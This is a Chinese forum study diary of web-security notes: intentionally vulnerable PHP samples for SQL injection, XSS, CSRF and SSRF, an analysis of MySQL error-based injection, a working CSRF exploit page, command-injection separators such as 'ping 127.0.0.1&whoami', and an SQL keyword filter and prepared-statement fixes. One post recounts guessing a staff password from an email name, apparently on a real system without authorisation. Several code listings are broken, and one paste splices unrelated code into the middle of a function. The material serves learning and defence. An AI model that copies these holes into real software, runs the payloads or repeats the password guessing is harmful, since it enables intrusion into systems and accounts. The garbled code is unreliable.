陈艺琳的学习日记

pukr · 发表于 2020-7-9 08:23:51

import pexpect
PROMPT = ['# ','>>> ','> ','\$ ']
def send_command(child, cmd):
child.sendline(cmd)
child.expect(PROMPT)
print chlid.before
def connect(user, host, password):
ssh_newkey = 'Are you sure you want to continue connecting'
connStr = 'ssh '+user+'@'+host
child = pexpect.spawn(connStr)
ret = child.expext([pexpect.TIMEOUT, ssh_newkey, '[P|p]assword:'])
if ret == 0:
print('[-] Error Connecting')
return
if ret == 1:
child.sendline('yes')
ret = child.expect([pexpect.TIMEOUT, '[P|p]assword:'])
if ret == 0:
print('[-] Error Connecting')
return
child.sendline(password)
child.expect(PROMPT)
return child

复制代码

pukr · 发表于 2020-7-14 08:07:45

得到教工账号历程：能看到教工身份证、邮箱。有些邮箱名很奇特，结合我自身来考虑，是下了功夫想这个名字的，并且以我胸无点墨的文学素养能有一个下功夫的名字不容易。尤其是上了年纪的人，很可能一个名字来回用。
如下图：

邮箱看起来不是随便取的，那么试试这个邮箱能不能做密码。运气buff加持，这就是密码。

推己及人，多方思索。也确实有运气成分，我试了得一会儿才找到一个。

pukr · 发表于 2020-7-16 07:52:53

[转] Mysql报错注入原理分析(count()、rand()、group by)

一直在用mysql数据库报错注入方法，但为何会报错？

百度谷歌知乎了一番，发现大家都是把官网的结论发一下截图，然后执行sql语句证明一下结论，但是没有人去深入研究为什么rand不能和order by一起使用，也没彻底说明三者同时使用报错的原理。

0x01 位置问题？

select count(*),(floor(rand(0)*2))x from information_schema.tables group by x; 这是网上最常见的语句,目前位置看到的网上sql注入教程,floor 都是直接放count(*) 后面，为了排除干扰，我们直接对比了两个报错语句，如下图

由上面的图片，可以知道报错跟位置无关。

0x02 绝对报错还是相对报错？

是不是报错语句有了floor(rand(0)*2)以及其他几个条件就一定报错？其实并不是如此，我们先建建个表，新增一条记录看看，如下图：

确认表中只有一条记录后，再执行报错语句看看，如下图：

多次执行均未发现报错。

然后我们新增一条记录。

然后再测试下报错语句

多次执行并没有报错

OK 那我们再增加一条

执行报错语句

ok 成功报错

由此可证明floor(rand(0)*2)报错是有条件的，记录必须3条以上，而且在3条以上必定报错，到底为何？请继续往下看。

0x03 随机因子具有决定权么(rand()和rand(0))

为了更彻底的说明报错原因，直接把随机因子去掉，再来一遍看看，先看一条记录的时候，如下图:

一条记录的话无论执行多少次也不报错

然后增加一条记录。

两条记录的话结果就变成不确定性了

随机出现报错。

然后再插入一条

三条记录之后，也和2条记录一样进行随机报错。

由此可见报错和随机因子是有关联的，但有什么关联呢，为什么直接使用rand()，有两条记录的情况下就会报错，而且是有时候报错，有时候不报错，而rand(0)的时候在两条的时候不报错，在三条以上就绝对报错？我们继续往下看。

0x04 不确定性与确定性

前面说过，floor(rand(0)*2)报错的原理是恰恰是由于它的确定性，这到底是为什么呢？从0x03我们大致可以猜想到，因为floor(rand()*2)不加随机因子的时候是随机出错的，而在3条记录以上用floor(rand(0)*2)就一定报错，由此可猜想floor(rand()*2)是比较随机的，不具备确定性因素，而floor(rand(0)*2)具备某方面的确定性。

为了证明我们猜想，分别对floor(rand()*2)和floor(rand(0)*2)在多记录表中执行多次(记录选择10条以上)，在有12条记录表中执行结果如下图：

连续3次查询，毫无规则，接下来看看select floor(rand(0)*2) from `T-Safe`;，如下图：

可以看到floor(rand(0)*2)是有规律的，而且是固定的，这个就是上面提到的由于是确定性才导致的报错，那为何会报错呢，我们接着往下看。

0x05 count与group by的虚拟表

使用select count(*) from `T-Safe` group by x;这种语句的时候我们经常可以看到下面类似的结果：

可以看出 test12的记录有5条

与count(*)的结果相符合，那么mysql在遇到select count(*) from TSafe group by x;这语句的时候到底做了哪些操作呢，我们果断猜测mysql遇到该语句时会建立一个虚拟表(实际上就是会建立虚拟表)，那整个工作流程就会如下图所示：

先建立虚拟表，如下图(其中key是主键，不可重复):

2.开始查询数据，取数据库数据，然后查看虚拟表存在不，不存在则插入新记录，存在则count(*)字段直接加1，如下图:

由此看到如果key存在的话就+1，不存在的话就新建一个key。

那这个和报错有啥内在联系，我们直接往下来，其实到这里，结合前面的内容大家也能猜个一二了。

0x06 floor(rand(0)*2)报错

其实mysql官方有给过提示，就是查询的时候如果使用rand()的话，该值会被计算多次，那这个“被计算多次”到底是什么意思，就是在使用group by的时候，floor(rand(0)*2)会被执行一次，如果虚表不存在记录，插入虚表的时候会再被执行一次，我们来看下floor(rand(0)*2)报错的过程就知道了，从0x04可以看到在一次多记录的查询过程中floor(rand(0)*2)的值是定性的，为011011…(记住这个顺序很重要)，报错实际上就是floor(rand(0)*2)被计算多次导致的，具体看看select count(*) from TSafe group by floor(rand(0)*2);的查询过程：

1.查询前默认会建立空虚拟表如下图:

2.取第一条记录，执行floor(rand(0)*2)，发现结果为0(第一次计算),查询虚拟表，发现0的键值不存在，则floor(rand(0)*2)会被再计算一次，结果为1(第二次计算)，插入虚表，这时第一条记录查询完毕，如下图:

3.查询第二条记录，再次计算floor(rand(0)*2)，发现结果为1(第三次计算)，查询虚表，发现1的键值存在，所以floor(rand(0)*2)不会被计算第二次，直接count(*)加1，第二条记录查询完毕，结果如下:

4.查询第三条记录，再次计算floor(rand(0)*2)，发现结果为0(第4次计算)，查询虚表，发现键值没有0，则数据库尝试插入一条新的数据，在插入数据时floor(rand(0)*2)被再次计算，作为虚表的主键，其值为1(第5次计算)，然而1这个主键已经存在于虚拟表中，而新计算的值也为1(主键键值必须唯一)，所以插入的时候就直接报错了。

5.整个查询过程floor(rand(0)*2)被计算了5次，查询原数据表3次，所以这就是为什么数据表中需要3条数据，使用该语句才会报错的原因。

0x07 floor(rand()*2)报错

由0x05我们可以同样推理出不加入随机因子的情况，由于没加入随机因子，所以floor(rand()*2)是不可测的，因此在两条数据的时候，只要出现下面情况，即可报错，如下图:

最重要的是前面几条记录查询后不能让虚表存在0,1键值，如果存在了，那无论多少条记录，也都没办法报错，因为floor(rand()*2)不会再被计算做为虚表的键值，这也就是为什么不加随机因子有时候会报错，有时候不会报错的原因。如图：

当前面记录让虚表长成这样子后，由于不管查询多少条记录，floor(rand()*2)的值在虚表中都能找到，所以不会被再次计算，只是简单的增加count(*)字段的数量，所以不会报错，比如floor(rand(1)*2)，如图：

在前两条记录查询后，虚拟表已经存在0和1两个键值了，所以后面再怎么弄还是不会报错。

总之报错需要count(*)，rand()、group by，三者缺一不可。

pukr · 发表于 2020-7-17 07:45:32

联合注入

代码分析：

<?php
$con = mysqli_connect("localhost","root","123456","test");
if(mysqli_connect_errno())
{
echo "连接失败: ".mysqli_connect_error();
}
$id = $_GET['id'];
$result = mysqli_query($con, "select * from users where `id`=".$id)
$row = mysqli_fetch_array($result)
echo $row['username'].": ".$row['address'];
echo "<br>";
?>

复制代码

Boolean注入

代码分析：

<?php
$con = mysqli_connect("localhost","root","123456","test");
if(mysqli_connect_errno())
{
echo "连接失败: ".mysqli_connect_error();
}
$id = $_GET['id'];
if(preg_match("/union|sleep|benchmark/i", $id)){
exit("no");
}
$results = mysqli_query($con,"select * from users where `id`='".$id."'");
$row = mysqli_fetch_array($results);
if($row){
exit("yes");
}
else{
exit("no");
}
?>

复制代码

报错注入

代码分析：

<?php
$con = mysqli_connect("localhost","root","123456","test");
if(mysqli_connect_errno())
{
echo "连接失败: ".mysqli_connect_error();
}
$username = $_GET['username'];
if($result = mysqli_query($con,"select * from users where `username`='".$username."'")){
echo "ok";
}
else{
echo mysqli_error($con)
}
?>

复制代码

可以使用union语句+floor(rand()*2)、updatexml、extravaluable。

盲注

正则表达式类：
select 'a' regexp '^[a-z]'
![regexp.jpg]

堆叠查询

代码分析：

<?php
try{
$conn = new PDO("mysql:host=localhost;dbname=test","root","123456");
$conn->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
$stmt=$conn->query("select * from users where `id` = '".$_GET['id']."'");
$result = $stmt->setFetchMode(PDO::FETCH_ASSOC);
foreach($stmt->fetchAll() as $k=>$v){
foreach($v as $key=>$value){
echo $value;
}
}
$dsn = null;
}
catch(PDOException $e){
echo "error";
}
$conn =null;
?>

复制代码

PDO（PHP数据对象）是一个轻量级的、具有兼容接口的PHP数据连接拓展，是一个PHP官方的PECL库，随PHP 5.1发布，需要PHP 5的面向对象支持，因而在更早的版本上无法使用。它所提供的数据接入抽象层，具有与具体数据库类型无关的优势，为它所支持的数据库提供统一的操作接口。目前支持多种数据库等。由于PDO是在底层实现的统一的数据库操作接口，因而利用它能够实现更高级的数据库操作，比如存储过程的调度等。

具体可百度PDO相关

在堆叠注入页面中，程序获取GET参数ID，使用PDO的方式进行数据查询，但仍然将参数ID拼接到查询语句，导致PDO没有起到预编译的效果，存在SQL注入漏洞。

PDO可以执行多语句，但通常返回第一条语句的结果。所以第二条语句可以用update更新注入或者时间盲注。

二次注入

<?php
$con = mysqli_connect("localhost","root","root","sql");
if(mysqli_connect_errno()){
echo "连接失败: ".mysqli_connect_error();
}
$username = $_GET['username'];
$password = $_GET['password'];
$result = mysqli_query($con,"insert into users(`username`,`password`) values ('".allslashes($username)."','".md5($password)."')");
echo "新ID为: ".mysqli_insert_id($con);
?>

复制代码

当访问username=test’&password=123456时，执行的sql语句为

insert into users(`username`,`password`) values ('test\'','e10adc3949ba59abbe56e057f20f883e');

复制代码

2.php的代码如下：

<?php
$con = mysqli_connect("localhost","root","root","sql");
if(mysqli_connect_errno()){
echo "连接失败: ".mysqli_connect_error();
}
$id = intval($_GET['id']);
$result = mysqli_qeury($con,"select * from users where `id`=".$id);
$row = mysqli_fetch_array($row);
$username = $row['username'];
$result2 = mysqli_query($con,"select * from person where `username` = '".$username."'");
if($row2 = mysqli_fetch_array($result2)){
echo $row2['username'].":".$row2['money'];
}
else{
echo mysqli_error($con);
}
?>

复制代码

宽字节注入

代码分析：

<?php
$conn = mysql_connect('localhost','root','123456') or die('bad!');
mysql_select_db('test',$conn) or emMsg("数据库连接失败");
mysql_query("SET NAMES 'gbk'",$conn);
$id = addslashes($_GET['id']);
$sql = "select * from users where id='$id' limit 0,1";
$result = mysql_query($sql,$conn) or die(mysql_error());
$row = mysql_fetch_array($result);
if($row){
echo $row['username']." : ".$row['address'];
}
else{
print_r(mysql_error());
}
?>
</font>
<?php
echo "<br> The Query String is: ".$sql."<br>";
?>

复制代码

这里不能使用单引号之类的符号（都被转义了），所以要嵌套查询，避免出现引号。如：

select column_name from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1) limit 0,1

复制代码

原本符号被转义了，无法闭合，存在注入点的可能性就很小。但若SET NAMES 'GBK'将编码设置为宽字节gbk，就可能会存在宽字节注入漏洞。

php中通过iconv()转码时，也可能会产生注入。

pukr · 发表于 2020-7-18 10:01:26

本帖最后由 pukr 于 2020-7-18 10:06 编辑

cookie注入

代码分析：

<?php
$id = $_COOKIE['id'];
$value = 1;
setcookie("id",$value);
$con = mysqli_connect("localhost","root","root","sql");
if(mysqli_connect_error()){
echo "连接失败: ". mysqli_connect_error();
}
$result = mysqli_query($con,"select * from users where `id`=".$id);
if(!$result){
printf("error: %s\n",mysqli_error($con));
exit();
}
$row = mysqli_fetch_array($result);
echo $row['username']." : ".$row['password'];
echo "<br>";
?>

复制代码

XFF头注入

代码分析：

<?php
$con = mysqli_connect("localhost","root","root","sql");
if(mysqli_connect_error()){
echo "连接失败: ". mysqli_connect_error();
}
if(getenv('HTTP_CLIENT_IP')){
$ip = getenv('HTTP_CLIENT_IP');
}
elseif(getenv('HTTP_X_FORWARDED_FOR')){
$ip = getenv('HTTP_X_FORWARDED_FOR');
}
elseif(getenv('REMOTE_ADDR')){
$ip = getenv('REMOTE_ADDR');
}
else{
$ip = $HTTP_SERVER_VARS['REMOTE_ADDR'];
}
$result = mysqli_query($con,"select * from users where `ip`=".$ip);
if(!$result){
printf("error: %s\n",mysqli_error($con));
exit();
}
$row = mysqli_fetch_array($result);
echo $row['username']." : ".$row['password'];
echo "<br>";
?>

复制代码

修复建议

<?php
functionCheckSql($db_string,$querytype='select')
{
global $cfg_cookie_encode;
$clean = '';
$error = '';
$old_pos = 0;
$pos = -1;
$log_file = DEDEINC.'/../data/'.md5($cfg_cookie_encode).'_safe.txt';
$userIP = GetIP();
$getUrl = GetCurlUrl();
//普通查询过滤一些特殊语法
if($querytype == 'select'){
$nowallow1 = "[^0-9a-z@\._-]{1,}(union|sleep|benchmark|load_file|outfile)[^0-9a-z@\._-]{1,}";
$nowallow2 = "--|/\*";
if(preg_match("/".$nowallow1."/i",$db_string)){
fputs(fopen($log_file,'a+'),"$userIP||$getUrl||$db_string||SelectBreak\r\n");
exit("<font size='5' color='red'>Safe Alert: Request Error Step 1!</font>");
}
}
//完整的SQL检查
while(TRUE){
$pos = strpos($db_string,'\'',$pos+1);
if($pos === False){
break;
}
$clean.=substr($db_string,$old_pos,$pos-$old_pos);
while (TRUE) {
$pos1 = strpos($db_string, '\'',$pos+1);
$pos2 = strpos($db_string, '\\',$pos+1);
if($pos1 === False){
break;
}
elseif ($pos2 === False || $pos2>$pos1) {
$pos = $pos1;
break;
}
$pos = $pos2+1;
}
$clean. = '$s
[color=#555555][font=Lato, &quot]预编译语句[/font][/color][font=Lato, PingFang SC, Microsoft YaHei, sans-serif][color=#555555]
[/color][/font]
[code]$dbms = 'mysql';
$db_host = 'localhost';
$db_user = 'root';
$db_pass = 'root';
$db_name = 'study';
$dsn = "$dbms:host=$db_host;dbname=$db_name";
$conn = new PDO($dsn,$db_user,$db_pass);
//判断数据库是否连接成功
if($conn->errorCode()){
die("filed".$conn->errorInfo());
}
$sql = "select * from users where username = :name";
//预编译语句
$stmt = $conn->prepare($sql);
//定义要传入的变量（可以接收传过来的值）
$username='admin';
//将变量绑定到占位初
$stmt ->bindParam(':name',$username);
//执行sql语句
$stmt->execute();
// pdo预编译占位符
// $sql = "select * from users where username=? ";
// $stmt = $conn->prepare($sql);
// $username = 'root';
//占位符通过变量绑定
// $stmt -> bindParam(1,$username);
// $stmt->execute();
// $stmt->bindColumn(3,$id);
// $stmt->bindColumn(2,$username);
// 占位符通过数组绑定
// $stmt ->execute([$username]);
// $stmt->bindColumn(3,$id);
// $stmt->bindColumn(2,$username);
//将对应的数据库对应的列绑定到变量上
$stmt->bindColumn(1,$pass);
$stmt->bindColumn(2,$user);
$stmt->bindColumn(3,$id);
//将数据取出
while($stmt->fetch()){
echo $id."<br>";
echo $username."<br>";
}
//释放内存资源
$stmt =null;
//断开连接
$conn = null;

复制代码

方法一：执行一条使用命名占位符的预处理语句

<?php
$dbms = 'mysql';
$db_host = 'localhost';
$db_user = 'root';
$db_pass = 'root';
$db_name = 'job';
$dsn = "$dbms:host=$db_host;dbname=$db_name";
$conn = new PDO($dsn,$db_user,$db_pass);
//$conn->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
if($conn->errorCode()){
die("failed:".$conn->errorInfo());
}
//else{
// echo "success";
//}
$sql = "select * from company where c_id = :c_id and c_name=:c_name";
$stmt = $conn->prepare($sql);
$stmt->execute(array(":c_id"=>10086,":c_name"=>'dianxin'));
$stmt->setFetchMode(PDO::FETCH_ASSOC);
//echo $stmt->rowCount();
foreach($stmt->fetchAll() as $k=>$v){
foreach ($v as $key=>$value){
echo $value;
echo "<br>";
}
}
$stmt = null;
$conn = null;
?>

复制代码

方法二：执行一条使用问号占位符的预处理语句

<?php
$dbms = 'mysql';
$db_host = 'localhost';
$db_user = 'root';
$db_pass = 'root';
$db_name = 'job';
$dsn = "$dbms:host=$db_host;dbname=$db_name";
$conn = new PDO($dsn,$db_user,$db_pass);
//$conn->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
if($conn->errorCode()){
die("failed:".$conn->errorInfo());
}
//else{
// echo "success";
//}
//$sql = "select * from company where c_id = :c_id and c_name=:c_name";
$sql = "select * from company where c_id = ? and c_name= ? ";
$stmt = $conn->prepare($sql);
//$stmt->execute(array(":c_id"=>10086,":c_name"=>'dianxin'));
$stmt->execute(array(10086,'dianxin'));
$stmt->execute(array(10086,'dianxin'));
$stmt->setFetchMode(PDO::FETCH_ASSOC);
//echo $stmt->rowCount();
foreach($stmt->fetchAll() as $k=>$v){
foreach ($v as $key=>$value){
echo $value;
echo "<br>";
}
}
$stmt = null;
$conn = null;
?>

复制代码

;
$old_pos = $pos+1;
}
$clean.=substr($db_string,$old_pos);
$clean = trim(strtolower(preg_replace(array('~\s+~s'), arrary(' '), $clean)));
//老版本的MySQL不支持union, 常用的程序里也不使用union，但一些黑客使用它,所以要检查
if(strpos($clean, 'union') !== False && preg_match('~(^|[^a-z])union($|[^[a-z])~s',$clean) != 0){
$fail = TRUE;
$error = "union detect";
}
//发布版本的程序可能几乎不包括 -- # 这样的注释但黑客可能会使用。
elseif(strpos($clean, '/*') > 2 || strpos($clean,'--') !== False || strpos($clean, '#') !== False){
$fail = TRUE;
$error = "comment detect";
}
//这些函数不会被使用但黑客可能会用它来操作文件 down掉数据库
elseif (strpos($clean, 'sleep') !== False && preg_match('~(^|[^a-z])sleep($|[^[a-z])~s',$clean) != 0) {
$fail = TRUE;
$error = "slown down detect";
}
elseif (strpos($clean, 'benchmark') !== False && preg_match('~(^|[^a-z])benchmark($|[^[a-z])~s',$clean) != 0) {
$fail = TRUE;
$error = "slown down detect";
}
elseif (strpos($clean, 'load_file') !== False && preg_match('~(^|[^a-z])load_file($|[^[a-z])~s',$clean) != 0) {
$fail = TRUE;
$error = "file fun detect";
}
elseif (strpos($clean, 'into outfile') !== False && preg_match('~(^|[^a-z])into\s+outfile($|[^[a-z])~s',$clean) != 0) {
$fail = TRUE;
$error = "file fun detect";
}
//老版本的MySQL不支持子查询程序里用的可能也少但黑客可能使用它来查询数据库敏感信息
elseif (preg_match('~\([^)]*?select~s', $clean) ! =0 ) {
$fail = TRUE;
$error = "sub select detect";
}
if(!empty($fail)){
fputs(fopen($log_file, 'a+'),"$userIP||$getUrl||$db_string||SelectBreak\r\n");
exit("<font size='5' color='red'>Safe Alert: Request Error Step 2!</font>");
}
else{
return $db_string;
}
}
?>[/code]
预编译语句

$dbms = 'mysql';
$db_host = 'localhost';
$db_user = 'root';
$db_pass = 'root';
$db_name = 'study';
$dsn = "$dbms:host=$db_host;dbname=$db_name";
$conn = new PDO($dsn,$db_user,$db_pass);
//判断数据库是否连接成功
if($conn->errorCode()){
die("filed".$conn->errorInfo());
}
$sql = "select * from users where username = :name";
//预编译语句
$stmt = $conn->prepare($sql);
//定义要传入的变量（可以接收传过来的值）
$username='admin';
//将变量绑定到占位初
$stmt ->bindParam(':name',$username);
//执行sql语句
$stmt->execute();
// pdo预编译占位符
// $sql = "select * from users where username=? ";
// $stmt = $conn->prepare($sql);
// $username = 'root';
//占位符通过变量绑定
// $stmt -> bindParam(1,$username);
// $stmt->execute();
// $stmt->bindColumn(3,$id);
// $stmt->bindColumn(2,$username);
// 占位符通过数组绑定
// $stmt ->execute([$username]);
// $stmt->bindColumn(3,$id);
// $stmt->bindColumn(2,$username);
//将对应的数据库对应的列绑定到变量上
$stmt->bindColumn(1,$pass);
$stmt->bindColumn(2,$user);
$stmt->bindColumn(3,$id);
//将数据取出
while($stmt->fetch()){
echo $id."<br>";
echo $username."<br>";
}
//释放内存资源
$stmt =null;
//断开连接
$conn = null;

复制代码

方法一：执行一条使用命名占位符的预处理语句

<?php
$dbms = 'mysql';
$db_host = 'localhost';
$db_user = 'root';
$db_pass = 'root';
$db_name = 'job';
$dsn = "$dbms:host=$db_host;dbname=$db_name";
$conn = new PDO($dsn,$db_user,$db_pass);
//$conn->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
if($conn->errorCode()){
die("failed:".$conn->errorInfo());
}
//else{
// echo "success";
//}
$sql = "select * from company where c_id = :c_id and c_name=:c_name";
$stmt = $conn->prepare($sql);
$stmt->execute(array(":c_id"=>10086,":c_name"=>'dianxin'));
$stmt->setFetchMode(PDO::FETCH_ASSOC);
//echo $stmt->rowCount();
foreach($stmt->fetchAll() as $k=>$v){
foreach ($v as $key=>$value){
echo $value;
echo "<br>";
}
}
$stmt = null;
$conn = null;
?>

复制代码

方法二：执行一条使用问号占位符的预处理语句

<?php
$dbms = 'mysql';
$db_host = 'localhost';
$db_user = 'root';
$db_pass = 'root';
$db_name = 'job';
$dsn = "$dbms:host=$db_host;dbname=$db_name";
$conn = new PDO($dsn,$db_user,$db_pass);
//$conn->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
if($conn->errorCode()){
die("failed:".$conn->errorInfo());
}
//else{
// echo "success";
//}
//$sql = "select * from company where c_id = :c_id and c_name=:c_name";
$sql = "select * from company where c_id = ? and c_name= ? ";
$stmt = $conn->prepare($sql);
//$stmt->execute(array(":c_id"=>10086,":c_name"=>'dianxin'));
$stmt->execute(array(10086,'dianxin'));
$stmt->execute(array(10086,'dianxin'));
$stmt->setFetchMode(PDO::FETCH_ASSOC);
//echo $stmt->rowCount();
foreach($stmt->fetchAll() as $k=>$v){
foreach ($v as $key=>$value){
echo $value;
echo "<br>";
}
}
$stmt = null;
$conn = null;
?>

复制代码

pukr · 发表于 2020-7-18 16:04:18

本帖最后由 pukr 于 2020-7-18 16:07 编辑

https://www.cnblogs.com/beili/p/9855895.html
curl的使用，码
https://www.cnblogs.com/jbexploit/p/4553219.html
curl 爬虫

pukr · 发表于 2020-7-18 16:51:29

反射型xss代码分析：

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
</head>
<body>
<center>
<h6>把我们输入的字符串输出到input的value属性里</h6>
<form action="" method="get">
<h6>输入想显现的字符串</h6>
<input type="text" name="xss_input_value" value="输入"><br/>
<input type="submit">
</form>
<hr>
<?php
if(isset($_GET['xss_input_value'])){
echo '<input type="text" value="'.$_GET['xss_input_value'].'">';
}else{
echo '<input type="text" value="输出">'；
}
?>
</center>
</body>
</html>

复制代码

存储型xss代码分析：

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
</head>
<body>
<center>
<h6>输入留言内容</h6>
<form action="" method="post">
标题：<input type="text" name="title"><br/>
内容：<textarea name="content"></textarea><br/>
<input type="submit">
</form>
<hr>
<?php
$con=mysqli_connect("localhost","root","root","sql");
if(mysqli_connect_error()){
echo "连接失败：".mysqli_connect_error();
}
if(isset($_POST['title'])){
$result1=mysqli_query($con,"insert into xss(`title`,`content`) values ('".$_POST['title']."','".$_POST['content']."')");
}
$result2=mysqli_query($con,"select * from xss");
echo "<table border='1'><tr><td>标题</td><td>内容</td></tr>";
while($row=mysqli_fetch_array($result2)){
echo "<tr><td>".$row['title']."</td><td>".$row['content']."</td>";
}
echo "</table>";
?>
</center>
</body>
</html>

复制代码

DOM型xss代码分析：

<html>
<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
<script type="text">
function tihuan(){
document.getElementById("id1").innerHTML=document.getElementById("dom_input").value
}
</script>
</head>
<body>
<center>
<h6 id="id1">这里会显示输入的内容</h6>
<form action="" method="post">
<input type="text" id="dom_input" value="输入"><br/>
<input type="button" value="替换" onclick="tihuan()">
</form>
<hr>
</center>
</body>
</html>

复制代码

pukr · 发表于 2020-7-18 16:52:54

csrf代码分析：
后台添加用户操作：
先验证用户是否存在，如果存在则通过$_SESSION设置一个session:isadmin=admin。否则设置session:isadmin=guest
接下来判断isadmin的值，若isadmin != admin，跳转到登录页面，管理员登录才能添加用户。
获取post参数username和Password，插入到User表。

<?php
session_start();
if(isset($_GET['login'])){
$con=mysqli_connect("localhost","root","root","sql");
if(mysqli_connect_error()){
echo "连接失败：".mysqli_connect_error();
}
$username = addslashes($_GET['username']);
$password = $_GET['password'];
$result = mysqli_query($con,"select * from users where `username`='".$username."' and `password`='".md5($password)."'");
$row = mysqli_fetch_array($result);
if($row){
$_SESSION['isadmin'] = 'admin';
}else{
$_SESSION['isadmin'] = 'guest';
exit("登录失败");
}
}else{
$_SESSION['isadmin']='guest';
}
if($_SESSION['isadmin'] != 'admin'){
exit("请登录后台");
}
if(isset($_POST['submit'])){
if(isset($_POST['username'])){
$result1 = mysqli_query($con,"insert into users(`username`,`password`) values ('".$_POST['username']."','".md5($_POST['password'])."')");
exit($_POST['username']."添加成功");
}
}
?>

复制代码

CSRF利用代码：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script trpe="text/javascript" language="javascript">
var pauses = new Array("16");
var methods = new Array("POST");
var urls = new Array("http://xxx.com/scrf.php");
var params = new Array("submit=1&username=1&password=1");
function pausecomp(millis)
{
var date = new Date();
var curDate = null;
do { curDate = new Date(); }
while(CurDate-date < millis);
}
function run(){
var count = 1;
var i = 0;
for(i=0;i<count;i++){
makeXHR(methods[i],urls[i],params[i]);
pausecomp(pauses[i]);
}
}
var http_request = false;
function makeXHR(method,url,parameters){
http_request = false;
if(window.XMLHttpRequest){
//mozilla, safari
http_request = new XMLHttpRequest();
if(http_request.overrideMimeType){
http_request.overrideMimeType('text/html');
}else if(window.ActiveXObject){
//ie
try{
http_request = new ActiveXObject("Msxml2.XMLHTTP");
}catch(e){}
}
}
if(!http_request){
alert('cannot create XMLHTTP instance');
return false;
}
//http_request.onreadystatechange = alertContents;
if(method == 'GET'){
if(url.indexOf('?') == -1){
url = url+'?'+parameters;
}else{
url = url+'&'+parameters;
}
http_request.open(method,url,true);
http_request.send("");
}else if(method == 'POST'){
http_request.open(method,url,true);
http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded");
http_request.setRequestHeader("Content-length",parameters.length);
http_request.setRequestHeader("Connection","close");
http_request.send("parameters");
}
}
</script>
</head>
</html>

复制代码

修复建议：

1.验证referer

2.加入随机token

pukr · 发表于 2020-7-18 16:53:24

ssrf
代码分析：

<?php
function curl($url){
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_HEADER,0);
curl_exec($ch);
curl_close($ch);
}
$url = $_GET['url'];
curl($url);
?>

复制代码

修复建议：
1.请求端口只能是web端口，且只允许http与https的请求
2.限制不能访问内网ip
3.屏蔽返回详细信息

pukr · 发表于 2020-7-19 15:50:47

常用管道符：Windows

| 直接执行后面得语句，如ping www.baidu.com|whoami
|| 如果前面执行得语句执行出错，则执行后面得语句，如ping 2||whoami
& 如果前面的语句为假则执行后面得语句，前面的语句可真可假。ping 127.0.0.1&whoami
&& 如果前面得语句为假则直接出错，不执行后面的语句，前面的语句只能为真。ping 127.0.0.1&whoami

复制代码

linux

; 执行完前面的再执行后面的。如ping www.baidu.com|whoami
| 显示后面语句的执行结果。如ping www.baidu.com|whoami
|| 如果前面执行的语句执行出错，则执行后面得语句，如ping 2||whoami
& 如果前面的语句为假则执行后面得语句，前面的语句可真可假。ping 127.0.0.1&whoami
&& 如果前面得语句为假则直接出错，不执行后面的语句，前面的语句只能为真。ping 127.0.0.1&whoami

复制代码

		自动登录	找回密码
密码			立即注册

陈艺琳的学习日记

本帖子中包含更多资源